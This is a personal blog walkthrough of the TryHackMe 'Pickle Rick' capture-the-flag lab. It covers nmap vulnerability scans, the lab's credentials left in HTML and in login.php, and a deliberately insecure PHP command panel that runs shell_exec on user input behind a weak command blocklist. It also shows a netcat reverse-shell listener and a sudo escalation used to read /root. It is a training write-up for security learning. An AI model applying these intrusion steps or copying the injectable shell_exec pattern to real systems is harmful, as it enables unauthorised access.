Try Hack Me - Pickle Rick

A Rick and Morty CTF. Help turn Rick back into a human!

Posted By: (lee)
On: 2020-10-07
Tagged:

View the page

  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

Scan wth NMAP

kali@kali:~/ctf/thm/pickle_rick$ nmap -sV 10.10.198.132 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 22:14 PDT
Nmap scan report for 10.10.198.132
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.81 seconds

Try SSH

kali@kali:~/ctf/thm/pickle_rick$ ssh R1ckRul3s@10.10.198.132
R1ckRul3s@10.10.198.132: Permission denied (publickey).

Hmm.. ok so we're going to need the keys, no brute forcing with Hydra or the usual. What else can we find via the web server?

Scan Harder

kali@kali:~/ctf/thm/pickle_rick$ nmap --script=vuln 10.10.52.189
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-06 00:32 PDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.52.189
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /login.php: Possible admin folder
|_  /robots.txt: Robots file
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-sql-injection: 
|   Possible sqli for queries:
|     http://10.10.52.189:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.52.189:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|_    http://10.10.52.189:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 370.62 seconds

Ah yes, login.php and robots.txt! We get a login form and the contents of robots.txt turns out to be a password.

If we use that as the password on the login page we get a "command panel" page in which we can enter a command like ls or cat Sup3rS3cretPickl3Ingred.txt. Ok, the cat doesn't work, but we can just read that file directly and get the first of three ingredients! Poking around the filesystem some more we see a home directory for rick. We can read the file there, /home/rick/second ingredients using less, which is not restricted like cat is apparently and get the second ingredient!

Hmm, there is a cookie, PHPSESSID=cjsnqqo3lqlg7m361ophebd1l3 but that doesn't seem to be related to anything.

Ok, what about looking at the source of this portal page? Now that we know we can dump the contents of a file with less, we can less portal.php to see what we may see. Oh boy!

<?php
session_start();

if($_SESSION["login"] == false) {
   header("Location: /login.php"); die();
}

?>

<?php
      function contains($str, array $arr)
      {
          foreach($arr as $a) {
              if (stripos($str,$a) !== false) return true;
          }
          return false;
      }
      // Cant use cat
      $cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");
      if(isset($_POST["command"])) {
        if(contains($_POST["command"], $cmds)) {
          echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";
        } else {
          $output = shell_exec($_POST["command"]);
          echo "</br><pre>$output</pre>";
        }
      }

    ?>
    <!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->

Well, two things. Now we see the commands we "can't" run, and what looks like a Base64 encoded string in a comment. Might as well take a quick look at login.php as well.

<?php
session_start();
$errorMsg = "";
$validUser = $_SESSION["login"] === true;
if(isset($_POST["sub"])) {
  $validUser = $_POST["username"] == "R1ckRul3s" && $_POST["password"] == "Wubbalubbadubdub";
  if(!$validUser) $errorMsg = "Invalid username or password.";
  else $_SESSION["login"] = true;
}
if($validUser) {
   header("Location: /portal.php"); die();
}
?>

Mmmhmmm. Nothing revelatory. And it points out that the Base64 looking string was just a comment in the output html to begin with. Except it doesn't decode.... or does it? Base64 decode 4 times and you finally end up with rabbit hole. Indeed.

What about starting a reverse shell, I've confirmed we can ping my attacker machine, but alas:

kali@kali:~/ctf/thm/pickle_rick$ nc -vv -l -p 4444
listening on [any] 4444 ...
10.10.187.81: inverse host lookup failed: Unknown host
connect to [10.2.41.105] from (UNKNOWN) [10.10.187.81] 44530
 sent 0, rcvd 0

Ok. Keep it simple, do it all through the web pages itself. No reverse shell, no CVE, no SSH. How bout sudo -l?

Matching Defaults entries for www-data on ip-10-10-187-81.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-187-81.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

sudo ls -la /root

total 28
drwx------  4 root root 4096 Feb 10  2019 .
drwxr-xr-x 23 root root 4096 Oct  7 02:59 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Feb 10  2019 .ssh
-rw-r--r--  1 root root   29 Feb 10  2019 3rd.txt
drwxr-xr-x  3 root root 4096 Feb 10  2019 snap

sudo less /root/3rd.txt

3rd ingredients: ***** *****
Content © 2020 Lee Adams contact
Powered by Mango
d6f2-DIRTY